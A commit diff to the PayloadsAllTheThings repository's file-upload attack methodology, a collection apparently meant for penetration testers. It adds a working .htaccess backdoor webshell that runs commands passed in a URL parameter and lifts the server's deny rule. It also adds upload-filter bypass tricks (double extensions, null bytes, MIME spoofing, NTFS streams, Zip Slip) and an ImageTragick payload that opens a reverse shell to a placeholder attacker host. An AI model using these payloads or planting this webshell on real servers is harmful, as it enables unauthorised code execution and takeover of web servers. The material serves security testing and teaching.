Upload Methodology

CONTRIBUTING.md

@@ -1,6 +1,6 @@
 # CONTRIBUTING
 
-PayloadAllTheThings's Team :heart: pull requests :)
+PayloadsAllTheThings' Team :heart: pull requests :)
 Feel free to improve with your payloads and techniques !
 
 You can also contribute with a :beers: IRL, or using the sponsor button.

Upload Insecure Files/Configuration Apache .htaccess/.htaccess_phpinfo

@@ -0,0 +1,5 @@
+AddType application/x-httpd-php .htaccess
+# <?php phpinfo(); ?>
+SetHandler server-status
+SetHandler server-info
+

Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell

@@ -0,0 +1,23 @@
+# htaccess backdoor shell
+# this is relatively stealthy compared to a typical webshell
+
+# overriding deny rule
+# making htaccess accessible from the internet
+# without this you'll get a HTTP 403
+<Files ~ "^\.ht">
+Require all granted
+Order allow,deny
+Allow from all
+</Files>
+
+# Make the server treat .htaccess file as .php file
+AddType application/x-httpd-php .htaccess
+
+# <?php system($_GET['cmd']); ?>
+
+# To execute commands you would navigate to:
+# http://vulnerable.com/.htaccess?cmd=YourCommand
+
+# If system(); isnt working then try other syscalls
+# e.g. passthru(); shell_exec(); etc
+# If you still cant execute syscalls, try bypassing php.ini via htaccess

Upload Insecure Files/README.md

@@ -12,48 +12,58 @@ Uploaded files may pose a significant risk if not handled correctly. A remote at
     * [Picture upload with LFI](#picture-upload-with-lfi)
     * [Configuration Files](#configuration-files)
     * [CVE - Image Tragik](#cve---image-tragik)
+    * [ZIP Archive](#zip-archive)
 * [References](#references)
 
 
 ## Tools
 - [Fuxploider](https://github.com/almandin/fuxploider)
+- [Burp> Upload Scanner](https://portswigger.net/bappstore/b2244cbb6953442cb3c82fa0a0d908fa)
 
 ## Exploits
 
 ### PHP Extension
 
-```powershell
+* Default PHP extensions
-.php
+    ```powershell
-.php3
+    .php
-.php4
+    .php3
-.php5
+    .php4
-.php7
+    .php5
-
+    .php7
-Less known extensions
+    ```
-.pht
+* Less known extensions
-.phar
+    ```powershell
-.phpt
+    .pht
-.pgif
+    .phps
-.phtml
+    .phar
-.phtm
+    .phpt
-
+    .pgif
-Double extensions
+    .phtml
-.jpeg.php
+    .phtm
-.jpg.php
+    .inc
-.png.php
+    ```
-```
+* Double extensions
+    ```powershell
+    .jpeg.php
+    .jpg.php
+    .png.php
+    .*.php
+    ```
 
 ### Other extensions
 
-```powershell
+* asp : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)`
-asp : .asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)
+* perl: `.pl, .pm, .cgi, .lib`
-perl: .pl, .pm, .cgi, .lib
+* jsp : `.jsp, .jspx, .jsw, .jsv, .jspf`
-jsp : .jsp, .jspx, .jsw, .jsv, .jspf
+* Coldfusion: `.cfm, .cfml, .cfc, .dbm`
-Coldfusion: .cfm, .cfml, .cfc, .dbm
-```
 
 ### Upload tricks
 
+- Use double extensions : `.jpg.php`
+- Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg`
+- Mix uppercase and lowercase : `.pHp, .pHP5, .PhAr`
+
 - Null byte (works well against `pathinfo()`)
     * .php%00.gif
     * .php\x00.gif
@@ -61,13 +71,16 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm
     * .php\x00.png
     * .php%00.jpg
     * .php\x00.jpg
+- Special characters
+    * file.php...... (In Windows when a file is created with dots at the end those will be removed)
+    * file.php%20
 - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
     * `Content-Type : image/gif`
     * `Content-Type : image/png`
     * `Content-Type : image/jpeg`
 - [Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures)
-    
+    * Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.
-    Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.
+- Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character ":" will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. "file.asax:.jpg"). This file might be edited later using other techniques such as using its short filename. The "::$data" pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. "file.asp::$data.")
 
 ### Picture upload with LFI
 
@@ -78,6 +91,10 @@ Valid pictures hosting PHP code. Upload the picture and use a local file inclusi
 
 ### Configuration Files
 
+If you are trying to upload files to a PHP server, take a look at the .htaccess trick to execute code.
+If you are  trying to upload files to an ASP server, take a look at the .config trick to execute code.
+
+Configuration files examples
 - .htaccess
 - web.config
 - httpd.conf
@@ -86,12 +103,23 @@ Valid pictures hosting PHP code. Upload the picture and use a local file inclusi
 
 ### CVE - Image Tragik
 
+Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1)
+
 ```powershell
-HTTP Request
+push graphic-context
-Reverse Shell
+viewbox 0 0 640 480
-Touch command
+fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
+pop graphic-context
 ```
 
+More payload in the folder `Picture Image Magik`
+
+### ZIP archive
+
+When a ZIP/archive file is automatically decompressed after the upload
+
+* Zip Slip: directory traversal to write a file somewhere else
+
 ## References
 
 * Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil